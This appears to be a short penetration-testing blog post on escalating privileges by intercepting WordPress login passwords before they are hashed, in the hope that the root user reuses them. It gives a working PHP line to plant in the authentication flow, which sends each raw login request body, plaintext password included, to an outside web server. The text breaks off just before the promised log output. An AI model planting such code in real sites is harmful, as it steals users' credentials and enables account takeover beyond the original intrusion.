It’s a familiar situation, you’ve found some vulnerability and popped a limited shell.
You’ve enumerated services, the kernel, applications, plugins, the distribution, jobs, configs, file permissions, etc, etc - but you can’t find a feasible way to escalate your privileges.
I present the following scenario.
There is a web app on the system and you suspect the system root user (who also uses the web app) suffers from the common (and tempting) affliction of password re-use.
You’ve gained access to the database and dumped the web app root user’s password - but can’t crack it.
So, what can we do?
Intercept the password before it’s hashed.
For this demo we will be using a default WordPress install.
Our first step is to find where authentication is handled:
Once we have identified the location of the authentication form, we want to hijack the flow of execution and intercept the password - before it is hashed and compared in the database.
file_get_contents function can be used to include some resource from an arbitrary domain, while
php://input allows us to read raw
POST data directly from the request body.
By combining these components we can send authentication
POST data to some arbitrary site prior to being hashed (note: this code should be placed in the execution flow where authentication is handled):
file_get_contents("http://rileykidd.com/" . file_get_contents("php://input"));
Next time some user logs in, we will receive the following plain text in our server logs: